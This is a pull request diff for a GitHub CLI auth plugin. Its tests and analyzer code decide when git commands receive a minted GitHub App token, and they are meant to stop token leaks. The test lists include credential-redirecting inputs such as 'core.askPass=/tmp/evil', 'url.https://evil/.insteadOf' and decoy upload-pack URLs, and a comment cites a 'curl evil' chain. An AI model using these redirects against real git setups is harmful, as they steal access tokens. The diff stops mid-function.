### PR TITLE
Block compound GitHub operations after cd

### DIFF
--- a/src/bundled-plugins/github-cli-auth/git-command.test.ts
+++ b/src/bundled-plugins/github-cli-auth/git-command.test.ts
@@ -93,6 +93,12 @@ describe('analyzeGitCommand — inject (explicit url)', () => {
       repoSlug: 'acme/widgets',
     })
   })
+  test('push --repo=url', async () => {
+    expect(await analyze('git push --repo=https://github.com/acme/widgets.git main')).toEqual({
+      kind: 'inject',
+      repoSlug: 'acme/widgets',
+    })
+  })
 })
 
 describe('analyzeGitCommand — inject (remote resolution)', () => {
@@ -182,6 +188,101 @@ describe('analyzeGitCommand — cd rewrite', () => {
   test('cd dir && git -C other blocks (would stack two -C and change cwd)', async () => {
     expect((await analyze('cd workspace/repo && git -C other push origin main', ghRemote)).kind).toBe('block')
   })
+  test('redirection-prefixed git evidence resolves remotes from the cd directory', async () => {
+    const seen: string[] = []
+    const r = resolvers({
+      resolveRemoteUrl: async (cwd) => {
+        seen.push(cwd)
+        return cwd === '/agent/workspace/repo' ? 'https://github.com/acme/widgets.git' : null
+      },
+    })
+
+    const result = await analyze('cd workspace/repo && 2>/tmp/x git push origin main', r)
+    expect(result.kind).toBe('block')
+    expect(seen).toEqual(['/agent/workspace/repo'])
+  })
+  test('redirection-prefixed non-GitHub evidence remains tokenless pass-through from the cd directory', async () => {
+    const seen: string[] = []
+    const r = resolvers({
+      resolveRemoteUrl: async (cwd) => {
+        seen.push(cwd)
+        return cwd === '/agent/workspace/repo'
+          ? 'https://gitlab.com/acme/widgets.git'
+          : 'https://github.com/wrong/base.git'
+      },
+    })
+
+    expect(await analyze('cd workspace/repo && 2>/tmp/x git push origin main', r)).toEqual({
+      kind: 'pass-through',
+    })
+    expect(seen).toEqual(['/agent/workspace/repo'])
+  })
+  test.each([
+    'cd /tmp/repo && cd child && git push origin main',
+    'cd /tmp/repo && (cd child && git push origin main)',
+    'cd /tmp/repo && cd child && (git push origin main)',
+  ])('a simple later cd resolves compound evidence from its derived cwd: %s', async (command) => {
+    const seen: string[] = []
+    const r = resolvers({
+      resolveRemoteUrl: async (cwd) => {
+        seen.push(cwd)
+        return cwd === '/tmp/repo/child' ? 'https://github.com/acme/widgets.git' : 'https://gitlab.com/acme/widgets.git'
+      },
+    })
+
+    expect((await analyze(command, r)).kind).toBe('block')
+    expect(seen).toEqual(['/tmp/repo/child'])
+  })
+  test('a simple later cd whose remote is non-GitHub remains tokenless pass-through', async () => {
+    const seen: string[] = []
+    const r = resolvers({
+      resolveRemoteUrl: async (cwd) => {
+        seen.push(cwd)
+        return cwd === '/tmp/repo/child' ? 'https://gitlab.com/acme/widgets.git' : 'https://github.com/wrong/base.git'
+      },
+    })
+
+    expect(await analyze('cd /tmp/repo && cd child && git push origin main', r)).toEqual({
+      kind: 'pass-through',
+    })
+    expect(seen).toEqual(['/tmp/repo/child'])
+  })
+  test('an ambiguous later cd is ignored and remains tokenless', async () => {
+    expect(
+      await analyze(
+        'cd /tmp/repo && cd "$CHILD" && git push origin main',
+        resolvers({ resolveRemoteUrl: async () => 'https://github.com/acme/widgets.git' }),
+      ),
+    ).toEqual({ kind: 'pass-through' })
+  })
+  test.each([
+    'cd /tmp/repo && git status --short && git push origin main',
+    'cd /tmp/repo && git status --short && 2>/tmp/log git push origin main',
+    'cd /tmp/repo && git status --short && `git push origin main`',
+    'cd /tmp/repo && git push origin main && git status --short',
+    'cd /tmp/repo && git status --short && echo ready && git pull origin main',
+    'cd /tmp/repo && git status --short & git fetch origin',
+    'cd /tmp/repo && git status --short && (git push origin main)',
+    'cd /tmp/repo && git status --short && { git pull origin main; }',
+  ])('cd compound containing a remote git operation blocks with retry guidance: %s', async (command) => {
+    const result = await analyze(command, ghRemote)
+    expect(result.kind).toBe('block')
+    if (result.kind === 'block') {
+      expect(result.reason).toContain('Run local Git commands separately')
+      expect(result.reason).toContain('git -C <path>')
+    }
+  })
+  test('cd compound containing only local git operations passes through', async () => {
+    expect((await analyze('cd /tmp/repo && git status --short && git log --oneline', ghRemote)).kind).toBe(
+      'pass-through',
+    )
+  })
+  test('cd compound targeting a non-GitHub remote passes through', async () => {
+    const gitlabRemote = resolvers({ resolveRemoteUrl: async () => 'https://gitlab.com/acme/widgets.git' })
+    expect((await analyze('cd /tmp/repo && git status --short && git push origin main', gitlabRemote)).kind).toBe(
+      'pass-through',
+    )
+  })
 })
 
 describe('analyzeGitCommand — git -C resolution', () => {
@@ -199,10 +300,10 @@ describe('analyzeGitCommand — git -C resolution', () => {
   })
 })
 
-describe('analyzeGitCommand — config value flag is recognized as the subcommand boundary', () => {
-  test('git -c key=value push is blocked (user -c can redirect auth/destination)', async () => {
+describe('analyzeGitCommand — config value syntax is not mintable', () => {
+  test('git -c key=value push passes through without a token', async () => {
     const r = resolvers({ resolveRemoteUrl: async () => 'https://github.com/acme/widgets.git' })
-    expect((await analyze('git -c credential.helper= push origin main', r)).kind).toBe('block')
+    expect(await analyze('git -c credential.helper= push origin main', r)).toEqual({ kind: 'pass-through' })
   })
 })
 
@@ -309,6 +410,26 @@ describe('analyzeGitCommand — multi-remote resolution', () => {
     expect((await analyze('git fetch --multiple origin bogusgroup', r)).kind).toBe('pass-through')
   })
 
+  test.each(['gitlab', 'null', 'throw'] as const)(
+    'fetch --multiple retains GitHub evidence when another target is %s',
+    async (otherTarget) => {
+      const r = resolvers({
+        resolveRemoteUrl: async (_cwd, remote) => {
+          if (remote === 'origin') return 'https://github.com/acme/widgets.git'
+          if (otherTarget === 'gitlab') return 'https://gitlab.com/acme/widgets.git'
+          if (otherTarget === 'throw') throw new Error('resolver failed')
+          return null
+        },
+      })
+
+      expect((await analyze('git fetch --multiple origin other', r)).kind).toBe('pass-through')
+
+      const compound = await analyze('cd /tmp/repo && git status && git fetch --multiple origin other', r)
+      expect(compound.kind).toBe('block')
+      if (compound.kind === 'block') expect(compound.reason).toContain('git -C <path>')
+    },
+  )
+
   test('an explicit-port ssh URL is not recognized as github (no mint; would bypass https askpass)', async () => {
     expect(parseGithubRepoFromGitUrl('ssh://git@github.com:22/acme/widgets.git')).toBeNull()
     expect(parseGithubRepoFromGitUrl('ssh://git@github.com/acme/widgets.git')).toBe('acme/widgets')
@@ -330,46 +451,109 @@ describe('analyzeGitCommand — multi-remote resolution', () => {
 
 describe('analyzeGitCommand — token-exfil hardening', () => {
   const ghRemote = resolvers({ resolveRemoteUrl: async () => 'https://github.com/acme/widgets.git' })
+  const unmintableCommands = [
+    'git -ccore.askPass=/tmp/evil push origin main',
+    'git -C/tmp/repo push origin main',
+    'git -C',
+    "git -C '' push origin main",
+    'git -c',
+    'git --config-env',
+    'git --git-dir',
+    'git --work-tree',
+    'git --namespace',
+    'git --exec-path',
+    'git push --repo',
+    'git push --repo=',
+    'git push --repository',
+    'git push --unknown origin main',
+    'git push --receive-pack',
+    'git fetch --upload-pack',
+    'git clone --bundle-uri',
+    'git push --receive-pack https://github.com/acme/decoy.git origin',
+    'git fetch --upload-pack https://github.com/acme/decoy.git origin',
+    'git clone --bundle-uri https://github.com/acme/decoy.git https://github.com/acme/widgets.git',
+    'git clone --config',
+    'git clone --config core.askPass=/tmp/evil https://github.com/acme/widgets.git',
+    'git clone --config=core.askPass=/tmp/evil https://github.com/acme/widgets.git',
+  ]
 
-  test('leading env assignment (GIT_ASKPASS override) blocks', async () => {
-    expect((await analyze('GIT_ASKPASS=/tmp/evil git clone https://github.com/acme/widgets.git')).kind).toBe('block')
+  test('leading env assignment (GIT_ASKPASS override) runs tokenless', async () => {
+    expect(await analyze('GIT_ASKPASS=/tmp/evil git clone https://github.com/acme/widgets.git')).toEqual({
+      kind: 'pass-through',
+    })
   })
-  test('git -c url.insteadOf blocks', async () => {
+  test('git -c url.insteadOf runs tokenless', async () => {
     const cmd = 'git -c url.https://evil/.insteadOf=https://github.com/acme/ clone https://github.com/acme/widgets.git'
-    expect((await analyze(cmd)).kind).toBe('block')
+    expect(await analyze(cmd)).toEqual({ kind: 'pass-through' })
   })
-  test('git -c core.askPass blocks', async () => {
-    expect((await analyze('git -c core.askPass=/tmp/evil clone https://github.com/acme/widgets.git')).kind).toBe(
-      'block',
-    )
+  test('git -c core.askPass runs tokenless', async () => {
+    expect(await analyze('git -c core.askPass=/tmp/evil clone https://github.com/acme/widgets.git')).toEqual({
+      kind: 'pass-through',
+    })
   })
-  test('git --config-env (separate arg) blocks', async () => {
-    expect((await analyze('git --config-env core.askPass=EVIL clone https://github.com/acme/widgets.git')).kind).toBe(
-      'block',
-    )
+  test('git --config-env (separate arg) runs tokenless', async () => {
+    expect(await analyze('git --config-env core.askPass=EVIL clone https://github.com/acme/widgets.git')).toEqual({
+      kind: 'pass-through',
+    })
   })
-  test('git --config-env=<name>=<envvar> (inline form) blocks', async () => {
-    expect((await analyze('git --config-env=core.askPass=EVIL clone https://github.com/acme/widgets.git')).kind).toBe(
-      'block',
-    )
+  test('git --config-env=<name>=<envvar> (inline form) runs tokenless', async () => {
+    expect(await analyze('git --config-env=core.askPass=EVIL clone https://github.com/acme/widgets.git')).toEqual({
+      kind: 'pass-through',
+    })
   })
-  test('--git-dir / --work-tree blocks (git operates on a different repo)', async () => {
-    expect((await analyze('git --git-dir=/tmp/o/.git push origin main', ghRemote)).kind).toBe('block')
-    expect((await analyze('git --work-tree=/tmp/o push origin main', ghRemote)).kind).toBe('block')
+  test('--git-dir / --work-tree run tokenless', async () => {
+    expect(await analyze('git --git-dir=/tmp/o/.git push origin main', ghRemote)).toEqual({ kind: 'pass-through' })
+    expect(await analyze('git --work-tree=/tmp/o push origin main', ghRemote)).toEqual({ kind: 'pass-through' })
   })
-  test('--namespace / --exec-path blocks', async () => {
-    expect((await analyze('git --namespace=ns push origin main', ghRemote)).kind).toBe('block')
-    expect((await analyze('git --exec-path=/tmp/x push origin main', ghRemote)).kind).toBe('block')
+  test('--namespace / --exec-path run tokenless', async () => {
+    expect(await analyze('git --namespace=ns push origin main', ghRemote)).toEqual({ kind: 'pass-through' })
+    expect(await analyze('git --exec-path=/tmp/x push origin main', ghRemote)).toEqual({ kind: 'pass-through' })
+  })
+
+  test.each(unmintableCommands)('unknown, attached, or incomplete syntax never injects: %s', async (command) => {
+    expect((await analyze(command, ghRemote)).kind).not.toBe('inject')
+  })
+
+  test.each(unmintableCommands)(
+    'safe-cd does not make unknown, attached, or incomplete syntax mintable: %s',
+    async (gitCommand) => {
+      expect((await analyze(`cd /tmp/repo && ${gitCommand}`, ghRemote)).kind).not.toBe('inject')
+    },
+  )
+})
+
+describe('analyzeGitCommand — grouped tokenless commands', () => {
+  test.each([
+    '(git status --short)',
+    '{ git status --short; }',
+    'git status --short &',
+    'cd /tmp/repo && (git status --short)',
+    'cd /tmp/repo && { git status --short; }',
+    'cd /tmp/repo && git status --short &',
+  ])('local-only group/background passes through: %s', async (command) => {
+    expect(await analyze(command)).toEqual({ kind: 'pass-through' })
+  })
+
+  test.each([
+    '(git push origin main)',
+    '{ git fetch origin; }',
+    'git push origin main &',
+    'cd /tmp/repo && (git push origin main)',
+    'cd /tmp/repo && { git fetch origin; }',
+    'cd /tmp/repo && git push origin main &',
+  ])('non-GitHub group/background passes through: %s', async (command) => {
+    const gitlabRemote = resolvers({ resolveRemoteUrl: async () => 'https://gitlab.com/acme/widgets.git' })
+    expect(await analyze(command, gitlabRemote)).toEqual({ kind: 'pass-through' })
   })
 })
 
 describe('analyzeGitCommand — fetch/pull --all', () => {
   const ghRemote = resolvers({ resolveRemoteUrl: async () => 'https://github.com/acme/widgets.git' })
-  test('fetch --all blocks (cannot enumerate every remote safely)', async () => {
-    expect((await analyze('git fetch --all', ghRemote)).kind).toBe('block')
+  test('fetch --all runs tokenless (not in the positive allowlist)', async () => {
+    expect(await analyze('git fetch --all', ghRemote)).toEqual({ kind: 'pass-through' })
   })
-  test('pull --all blocks', async () => {
-    expect((await analyze('git pull --all', ghRemote)).kind).toBe('block')
+  test('pull --all runs tokenless', async () => {
+    expect(await analyze('git pull --all', ghRemote)).toEqual({ kind: 'pass-through' })
   })
 })
 
@@ -560,6 +744,27 @@ describe('analyzeGitCommand — clone-then-inspect (sanitized re-exec)', () => {
       'block',
     )
   })
+
+  test.each([
+    '</tmp/input git push origin main',
+    'exec git push origin main',
+    'command git push origin main',
+    'env FOO=bar git push origin main',
+    'exec git status --short',
+  ])('clone-tail git behind a narrow prefix rejects the clone-then-inspect rewrite: %s', async (tail) => {
+    const result = await analyze(`git clone https://github.com/acme/widgets.git /tmp/x && ${tail}`, ghRemote)
+    expect(result.kind).toBe('block')
+  })
+
+  test.each(['exec git status --short', 'env FOO=bar git push origin main'])(
+    'non-GitHub clone-tail git behind a narrow prefix remains tokenless: %s',
+    async (tail) => {
+      const gitlabRemote = resolvers({ resolveRemoteUrl: async () => 'https://gitlab.com/acme/widgets.git' })
+      expect(await analyze(`git clone https://gitlab.com/acme/widgets.git /tmp/x && ${tail}`, gitlabRemote)).toEqual({
+        kind: 'pass-through',
+      })
+    },
+  )
 
   test('clone with ; instead of && stays blocked (only && sequences after clone exits)', async () => {
     expect((await analyze('git clone https://github.com/acme/widgets.git /tmp/x; ls')).kind).toBe('block')

--- a/src/bundled-plugins/github-cli-auth/git-command.ts
+++ b/src/bundled-plugins/github-cli-auth/git-command.ts
@@ -1,23 +1,11 @@
-// Plain-`git` analog of analyzeGhCommand. `gh` names its repo in argv (`-R`);
-// `git` only implies it via a remote, so this RESOLVES the target repo:
-// explicit github.com URL -> remote name via `git remote get-url` -> the
-// branch.<cur>.pushRemote/remote.pushDefault/origin fallback chain. The slug
-// feeds the same per-repo mint the `gh` path uses; the token is injected via
-// GIT_ASKPASS env, never into the command string.
+// Plain-`git` analog of analyzeGhCommand. Git names its target indirectly, so
+// this analyzer resolves configured remotes before selecting a per-repo token.
 
 export type GitCommandDecision =
   | { kind: 'pass-through' }
   | { kind: 'block'; reason: string }
-  // rewrittenCommand replaces the executed command: `cd <dir> && git …` becomes
-  // `git -C <dir> …` so the token-bearing command stays a single bare `git`
-  // (no sibling process inherits the askpass env).
   | { kind: 'inject'; repoSlug: string; rewrittenCommand?: string }
 
-// Returns null when the remote/config is absent or git fails — the analyzer
-// then passes through so git fails honestly rather than us guessing a repo.
-// forPush selects the PUSH url (`git remote get-url --push`), which differs from
-// the fetch url when a remote sets `pushurl`; minting against the fetch url for a
-// push would scope the token to the wrong repo/owner.
 export type GitRemoteResolver = (cwd: string, remote: string, forPush: boolean) => Promise<string | null>
 export type GitConfigResolver = (cwd: string, key: string) => Promise<string | null>
 export type GitBranchResolver = (cwd: string) => Promise<string | null>
@@ -38,8 +26,7 @@ async function runGit(cwd: string, args: string[]): Promise<string | null> {
       stderr: 'ignore',
       env: { ...process.env, GIT_TERMINAL_PROMPT: '0', GIT_OPTIONAL_LOCKS: '0' },
     })
-    const exitCode = await proc.exited
-    if (exitCode !== 0) return null
+    if ((await proc.exited) !== 0) return null
     const out = (await new Response(proc.stdout).text()).trim()
     return out === '' ? null : out
   } catch {
@@ -54,8 +41,6 @@ export const defaultGitResolvers: GitResolvers = {
   resolveCurrentBranch: (cwd) => runGit(cwd, ['symbolic-ref', '--short', 'HEAD']),
 }
 
-const REMOTE_SUBCOMMANDS = new Set(['push', 'fetch', 'pull', 'clone', 'ls-remote'])
-
 const MULTI_OWNER_REASON =
   'This git command targets more than one repository; a single minted GitHub App ' +
   'token is scoped to one repo and cannot authenticate all of them. Split it into ' +
@@ -67,277 +52,585 @@ const COMPOSITION_REASON =
   '`git` command — no `;`, `&&`, `||`, `&`, newlines, pipes, redirections, ' +
   'command/parameter substitution, or subshells (any sibling process would ' +
   'inherit the token). The one accepted prefix is `cd <simple-path> && git …`, ' +
-  'which is rewritten to `git -C <path> …`.'
+  'which is rewritten to `git -C <path> …`. Run local Git commands separately, ' +
+  'then retry the remote operation as a standalone `git -C <path> …` command.'
 
-const DANGEROUS_CONFIG_REASON =
-  'A repo-targeting `git` command that would receive a minted GitHub App token ' +
-  'cannot carry a leading environment assignment or `-c`/`--config-env`/' +
-  '`--git-dir`/`--work-tree`/`--namespace`/`--exec-path`: those can redirect ' +
-  "git's authentication or destination away from the resolved repo (e.g. " +
-  '`-c url.https://evil/.insteadOf=…` or `-c core.askPass=…`), which would leak ' +
-  'the token. Remove them and re-run, or run without the minted token.'
-
-const FETCH_ALL_REASON =
-  '`git fetch --all` / `git pull --all` contacts every configured remote, which ' +
-  'cannot be enumerated safely here — a minted token scoped to one remote could ' +
-  'be sent to another. Fetch a specific remote instead.'
-
-// The exec prefix a `clone && <tail>` tail is re-executed under. Every key here
-// MUST mirror the overlay index.ts injects for a token-bearing git (the two
-// secrets TYPECLAW_GIT_TOKEN/GIT_ASKPASS, the operator PATs GH_TOKEN/GITHUB_TOKEN
-// that live in bash env, and the forced GIT_CONFIG_* + GIT_TERMINAL_PROMPT) so
-// the fresh tokenless shell inherits none of them. Absolute `/usr/bin/env` and
-// `/bin/bash` so a PATH-shadowed shim cannot defeat the strip; a missing binary
-// exits non-zero, failing closed. Drift here is a token leak — keep in lockstep
-// with index.ts's git overlay (guarded by a test in index.test.ts).
 const TAIL_STRIP_PREFIX =
   'exec /usr/bin/env -u TYPECLAW_GIT_TOKEN -u GIT_ASKPASS -u GH_TOKEN -u GITHUB_TOKEN ' +
   '-u GIT_TERMINAL_PROMPT -u GIT_CONFIG_COUNT -u GIT_CONFIG_KEY_0 -u GIT_CONFIG_VALUE_0 ' +
   '-u GIT_CONFIG_KEY_1 -u GIT_CONFIG_VALUE_1 -u GIT_CONFIG_KEY_2 -u GIT_CONFIG_VALUE_2 ' +
   '-u GIT_CONFIG_KEY_3 -u GIT_CONFIG_VALUE_3 /bin/bash -c'
 
-// OUTSIDE single quotes these spawn a sibling process (which would inherit the
-// askpass token) or expand shell state. `$`/backtick stay active inside double
-// quotes too, so they are screened separately. Mirrors gh-command.ts.
-const SHELL_ACTIVE_METACHARS = new Set(['|', ';', '&', '\n', '\r', '(', ')', '{', '}', '<', '>', '`', '$'])
+type RemoteSubcommand = 'push' | 'fetch' | 'pull' | 'clone' | 'ls-remote'
 
-// `\` (Bash escaping) and `#` (comments) are the two constructs our quote-aware
-// scanners do not model. Either can make our view of top-level structure disagree
-// with Bash's — so a command carrying them must never drive a token mint.
-function containsEscapeBlindSyntax(command: string): boolean {
-  return command.includes('\\') || command.includes('#')
+type TargetSpec =
+  | { kind: 'default-push' }
+  | { kind: 'single'; value: string; forPush: boolean }
+  | { kind: 'multiple'; values: string[] }
+
+type MintableInvocation = {
+  subcommand: RemoteSubcommand
+  cwd: string
+  dashCCount: number
+  target: TargetSpec
 }
 
-// Conservative raw-text probe for a `git` word — NOT the escape-blind tokenizer.
-// Used only to choose block-vs-pass in the fail-closed gate; a miss is harmless
-// (the command runs tokenless), so it never needs to be exhaustive.
-function looksLikePotentialGitCommand(command: string): boolean {
-  return /(^|[^A-Za-z0-9_])git(?=$|[^A-Za-z0-9_-])/.test(command)
+type RepoEvidence = {
+  slugs: string[]
+  complete: boolean
+}
+
+const EVIDENCE_GLOBAL_VALUE_OPTIONS = new Set([
+  '--config-env',
+  '--git-dir',
+  '--work-tree',
+  '--namespace',
+  '--exec-path',
+])
+const EVIDENCE_GLOBAL_INLINE_PREFIXES = ['--config-env=', '--git-dir=', '--work-tree=', '--namespace=', '--exec-path=']
+
+function noEvidence(complete = true): RepoEvidence {
+  return { slugs: [], complete }
 }
 
 export async function analyzeGitCommand(
   command: string,
   options: { cwd: string; resolvers: GitResolvers },
 ): Promise<GitCommandDecision> {
-  // Fail-closed lexical gate BEFORE any mint decision. The scanners below are
-  // quote-aware but do NOT model Bash backslash escaping or `#` comments, so
-  // either can make our escape-blind view of the command disagree with Bash and
-  // drive a token mint for a structure Bash parses differently (a `\"` that keeps
-  // a quote open, or a `#` that comments out an appended boundary). Any command
-  // carrying `\` or `#` therefore never reaches an inject decision: it blocks if
-  // it looks git-ish, else passes through tokenless. Never mint here.
-  if (containsEscapeBlindSyntax(command)) {
-    return looksLikePotentialGitCommand(command)
-      ? { kind: 'block', reason: COMPOSITION_REASON }
-      : { kind: 'pass-through' }
+  // clone-then-inspect is the established exception: the clone head is rebuilt
+  // from a tiny grammar and the tail runs only after exec strips every token var.
+  if (!containsEscapeOrComment(command)) {
+    const cloneThenInspect = analyzeCloneThenInspect(command)
+    if (cloneThenInspect !== null) return cloneThenInspect
   }
 
-  // The single permitted `cd <simple-path> && git …` shortcut is rewritten to a
-  // bare `git -C …` before any chain parsing, so a chain never has to reason
-  // about a `cd` segment changing cwd for the gits that follow it. Multi-git
-  // chains must use explicit `git -C` per segment instead.
-  const stripped = stripSafeCdPrefix(command)
-  if (stripped.unsafe) return { kind: 'pass-through' }
-  if (stripped.cdDir !== null) return analyzeSingleCdGit(stripped, options)
-
-  const cloneThenInspect = analyzeCloneThenInspect(command)
-  if (cloneThenInspect !== null) return cloneThenInspect
-
-  // Split the command into `&&`-joined git segments. null = not a pure
-  // git-only `&&` chain (a non-git segment, a forbidden shell operator, a
-  // leading env assignment, or no git at all).
-  const chain = extractGitInvocationChain(command)
-  if (chain === null) {
-    // Distinguish "no git here at all" (pass-through) from "git is present but
-    // the composition is unsafe" (block). A bare `ls`/`echo` is not our concern;
-    // a `git push … | tee` or `git … && curl evil` must be blocked, never run
-    // tokenless (which is what silently passing through used to do — the bug).
-    return containsGitInvocation(command) ? { kind: 'block', reason: COMPOSITION_REASON } : { kind: 'pass-through' }
-  }
-
-  const remoteSegments = chain.filter((s) => {
-    const sub = findSubcommand(s.args)
-    return sub !== undefined && REMOTE_SUBCOMMANDS.has(sub)
-  })
-  // No segment talks to a remote (e.g. `git status && git log`): nothing to
-  // authenticate, so pass through and let git run with no token.
-  if (remoteSegments.length === 0) return { kind: 'pass-through' }
-
-  // Every segment must pass the redirect screen: a token would live in the shared
-  // env the whole chain inherits, so a `-c`/env-assignment on ANY git could steer
-  // auth or destination.
-  for (const seg of chain) {
-    if (seg.hasLeadingEnvAssignment || hasDangerousGitConfig(seg.args)) {
-      return { kind: 'block', reason: DANGEROUS_CONFIG_REASON }
+  const safeCd = parseSafeCdPrefix(command, options.cwd)
+  if (safeCd.kind === 'unsafe') return { kind: 'pass-through' }
+  if (safeCd.kind === 'safe') {
+    const invocation = parseMintableGitInvocation(safeCd.rest, safeCd.cwd)
+    if (invocation !== null) {
+      const decision = await decideStandalone(invocation, options.resolvers)
+      if (invocation.dashCCount > 0) {
+        return decision.kind === 'inject' ? { kind: 'block', reason: COMPOSITION_REASON } : decision
+      }
+      if (decision.kind !== 'inject') return decision
+      return {
+        ...decision,
+        rewrittenCommand: safeCd.rest.replace(/^git\b/, `git -C ${posixSingleQuote(safeCd.cwd)}`),
+      }
     }
-    const sub = findSubcommand(seg.args)
-    if ((sub === 'fetch' || sub === 'pull') && seg.args.includes('--all')) {
-      return { kind: 'block', reason: FETCH_ALL_REASON }
-    }
+
+    if (!hasShellComposition(safeCd.rest)) return { kind: 'pass-through' }
+    const evidence = await discoverCompoundEvidence(safeCd.rest, safeCd.cwd, options.resolvers)
+    return evidence.slugs.length > 0 ? { kind: 'block', reason: COMPOSITION_REASON } : { kind: 'pass-through' }
   }
 
-  const repos = new Set<string>()
-  for (const seg of remoteSegments) {
-    const sub = findSubcommand(seg.args) as string
-    const effectiveCwd = resolveEffectiveCwd(options.cwd, seg.args)
-    // A resolver that throws is treated as "couldn't resolve" → pass-through, so
-    // a git/subprocess failure never crashes the hook or guesses a repo.
-    let slugs: string[]
-    try {
-      slugs = await resolveRepoSlugs(sub, seg.args, effectiveCwd, options.resolvers)
-    } catch {
-      return { kind: 'pass-through' }
-    }
-    for (const slug of slugs) repos.add(slug)
-  }
+  const invocation = parseMintableGitInvocation(command, options.cwd)
+  if (invocation !== null) return decideStandalone(invocation, options.resolvers)
 
-  // No github remote resolved (e.g. a gitlab chain): no token to mint, so pass
-  // through and let git run tokenless — do NOT block a legitimate non-github chain.
+  if (!hasShellComposition(command)) return { kind: 'pass-through' }
+
+  const evidence = await discoverCompoundEvidence(command, options.cwd, options.resolvers)
+  return evidence.slugs.length > 0 ? { kind: 'block', reason: COMPOSITION_REASON } : { kind: 'pass-through' }
+}
+
+async function decideStandalone(invocation: MintableInvocation, resolvers: GitResolvers): Promise<GitCommandDecision> {
+  const evidence = await resolveMintableEvidence(invocation, resolvers)
+  const repos = new Set(evidence.slugs)
+
+  // The order is deliberate: partial evidence may justify blocking a compound,
+  // but it can never justify minting for a standalone command.
   if (repos.size === 0) return { kind: 'pass-through' }
-
-  // A token WILL be minted. It must ride a SINGLE bare git: the shared chain env
-  // means a later segment — even `git leak` where the repo aliased `leak` to a
-  // shell command — would read it. The only multi-segment token-bearing form is
-  // `cd <path> && git …`, handled by analyzeSingleCdGit (rewritten to one git -C).
-  if (chain.length > 1) return { kind: 'block', reason: COMPOSITION_REASON }
-  // One minted token is repo-scoped, so more than one distinct repo (e.g.
-  // `fetch --multiple origin upstream`) can't authenticate.
+  if (!evidence.complete) return { kind: 'pass-through' }
   if (repos.size > 1) return { kind: 'block', reason: MULTI_OWNER_REASON }
-
   return { kind: 'inject', repoSlug: [...repos][0] as string }
 }
 
-// The single-git `cd <path> && git …` shortcut. Kept separate (and single-git
-// only) so the cwd rewrite stays simple: the token-bearing command becomes one
-// bare `git -C <path> …`, with no sibling inheriting the env. A `cd` in a
-// multi-git chain is rejected (callers use explicit `git -C` per segment).
-async function analyzeSingleCdGit(
-  stripped: StrippedCd,
-  options: { cwd: string; resolvers: GitResolvers },
-): Promise<GitCommandDecision> {
-  const segment = extractSingleGitInvocation(stripped.rest)
-  if (segment === null) return { kind: 'pass-through' }
-  const args = segment.args
-  const subcommand = findSubcommand(args)
-  if (subcommand === undefined || !REMOTE_SUBCOMMANDS.has(subcommand)) return { kind: 'pass-through' }
-  if (segment.hasLeadingEnvAssignment || hasDangerousGitConfig(args)) {
-    return { kind: 'block', reason: DANGEROUS_CONFIG_REASON }
+function parseMintableGitInvocation(command: string, baseCwd: string): MintableInvocation | null {
+  const words = tokenizeStandalone(command)
+  if (words === null || words[0] !== 'git') return null
+
+  let cursor = 1
+  let cwd = baseCwd
+  let dashCCount = 0
+  while (words[cursor] === '-C') {
+    const dir = words[cursor + 1]
+    if (dir === undefined || !isLiteralDirectory(dir)) return null
+    cwd = resolveCwd(cwd, dir)
+    dashCCount += 1
+    cursor += 2
   }
-  if ((subcommand === 'fetch' || subcommand === 'pull') && args.includes('--all')) {
-    return { kind: 'block', reason: FETCH_ALL_REASON }
-  }
-  const hasDashC = args.includes('-C')
-  const effectiveCwd = resolveEffectiveCwd(resolveCwd(options.cwd, stripped.cdDir), args)
-  let slugs: string[]
-  try {
-    slugs = await resolveRepoSlugs(subcommand, args, effectiveCwd, options.resolvers)
-  } catch {
-    return { kind: 'pass-through' }
-  }
-  if (slugs.length === 0) return { kind: 'pass-through' }
-  if (new Set(slugs).size > 1) return { kind: 'block', reason: MULTI_OWNER_REASON }
-  const repoSlug = slugs[0] as string
-  // The rewrite cannot stack two `-C` (the git part must not already carry one)
-  // and the rest must be a single bare git (no further composition).
-  if (containsShellActiveMetachar(stripped.rest) || hasDashC) {
-    return { kind: 'block', reason: COMPOSITION_REASON }
-  }
-  return { kind: 'inject', repoSlug, rewrittenCommand: rewriteCdToDashC(effectiveCwd, stripped.rest) }
+
+  const subcommand = words[cursor]
+  if (!isRemoteSubcommand(subcommand)) return null
+  const args = words.slice(cursor + 1)
+  const target = parseMintableTarget(subcommand, args)
+  return target === null ? null : { subcommand, cwd, dashCCount, target }
 }
 
-// The `git clone <url> <dir> && <tail>` shape: acquire a repo, then inspect it.
-// A naive `env -u TOKEN <tail>` is UNSOUND — shell substitution in the tail runs
-// in the still-token-bearing parent shell before `env`, and a stripped child can
-// still read the parent's env via /proc/$PPID/environ. So instead the git head
-// runs first (token reaches only the clone), then `exec` REPLACES the token-
-// bearing shell with `/usr/bin/env -u <keys> /bin/bash -c '<tail>'`: exec removes
-// that /proc target, the unset drops every injected key, and the tail rides as an
-// opaque single-quoted argument the fresh tokenless shell alone parses/expands.
-// Scoped to `clone` by DELIBERATE CHOICE, not a limit of the strip boundary
-// (which would neutralize the token just as well after fetch/pull). `clone` names
-// the repo in argv, so minting is unambiguous, and it creates a fresh tree the
-// tail inspects. fetch/pull would resolve the repo through an existing repo's cwd,
-// remotes, and mutable `.git/config` (and `pull` runs repo-configured integration
-// while the token is live) — extra resolution complexity and token-bearing surface
-// for a workflow already expressible as `git -C <repo> fetch` then a separate
-// tokenless inspect. So fetch/pull/push stay single-bare. Returns null when the
-// shape does not match, so the caller falls through to the normal chain analysis.
-function analyzeCloneThenInspect(command: string): GitCommandDecision | null {
-  // `\` and `#` are already rejected by the early gate in analyzeGitCommand, so
-  // splitCloneHeadAndTail's quote-aware scan is trustworthy here.
-  const split = splitCloneHeadAndTail(command)
-  if (split === null) return null
-  const { head, tail } = split
-  if (tail === '') return { kind: 'block', reason: COMPOSITION_REASON }
+function parseMintableTarget(subcommand: RemoteSubcommand, args: readonly string[]): TargetSpec | null {
+  if (subcommand === 'push') return parseMintablePush(args)
+  if (subcommand === 'fetch') return parseMintableFetch(args)
+  if (subcommand === 'pull') return parseSimpleRemote(args, false)
+  if (subcommand === 'clone') return parseExplicitUrl(args, 2)
+  return parseExplicitUrl(args, Number.POSITIVE_INFINITY)
+}
 
-  // A git in the tail is NOT inspection — it either wants the token (so it must
-  // ride the single-bare path or an explicit `git -C`) or is an exfil sibling.
-  // Fall through so the strict chain analysis keeps its existing block/pass rules
-  // for every `clone && git …` shape.
-  if (containsGitInvocation(tail)) return null
+function parseMintablePush(args: readonly string[]): TargetSpec | null {
+  const positionals: string[] = []
+  let repository: string | null = null
+  let upstream = false
 
